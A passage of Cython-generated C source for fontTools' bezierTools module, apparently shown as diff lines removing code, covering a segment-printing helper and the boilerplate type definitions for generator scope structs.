*__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - Py_ssize_t __pyx_t_2; - PyObject *(*__pyx_t_3)(PyObject *); - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("printSegments", 1); - - /* "fontTools/misc/bezierTools.py":1466 - * segments on a single line as a tuple. - * """ - * for segment in segments: # <<<<<<<<<<<<<< - * print(_segmentrepr(segment)) - * - */ - if (likely(PyList_CheckExact(__pyx_v_segments)) || PyTuple_CheckExact(__pyx_v_segments)) { - __pyx_t_1 = __pyx_v_segments; __Pyx_INCREF(__pyx_t_1); - __pyx_t_2 = 0; - __pyx_t_3 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_segments); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1466, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1466, __pyx_L1_error) - } - for (;;) { - if (likely(!__pyx_t_3)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1466, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1466, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1466, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1466, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1466, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1466, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } - } else { - __pyx_t_4 = __pyx_t_3(__pyx_t_1); - if (unlikely(!__pyx_t_4)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1466, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_4); - } - __Pyx_XDECREF_SET(__pyx_v_segment, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1467 - * """ - * for segment in segments: - * print(_segmentrepr(segment)) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_segmentrepr); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1467, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_6)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_v_segment}; - __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1467, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - __pyx_t_5 = __Pyx_PyObject_CallOneArg(__pyx_builtin_print, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1467, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":1466 - * segments on a single line as a tuple. - * """ - * for segment in segments: # <<<<<<<<<<<<<< - * print(_segmentrepr(segment)) - * - */ - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1462 - * - * - * def printSegments(segments): # <<<<<<<<<<<<<< - * """Helper for the doctests, displaying each segment in a list of - * segments on a single line as a tuple. - */ - - /* function exit code */ - __pyx_r = Py_None; __Pyx_INCREF(Py_None); - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.printSegments", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_segment); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_genexpr_arg_0); - Py_CLEAR(p->__pyx_v_t); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)o; - if (p->__pyx_genexpr_arg_0) { - e = (*v)(p->__pyx_genexpr_arg_0, a); if (e) return e; - } - if (p->__pyx_v_t) { - e = (*v)(p->__pyx_v_t, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct__genexpr", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct__genexpr", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_genexpr_arg_0); - Py_CLEAR(p->__pyx_v_t); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *)o; - if (p->__pyx_genexpr_arg_0) { - e = (*v)(p->__pyx_genexpr_arg_0, a); if (e) return e; - } - if (p->__pyx_v_t) { - e = (*v)(p->__pyx_v_t, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_1_genexpr", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_1_genexpr", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_v_ts); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)o; - if (p->__pyx_v_ts) { - e = (*v)(p->__pyx_v_ts, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_2_splitCubicAtTC", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_2_splitCubicAtTC", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, 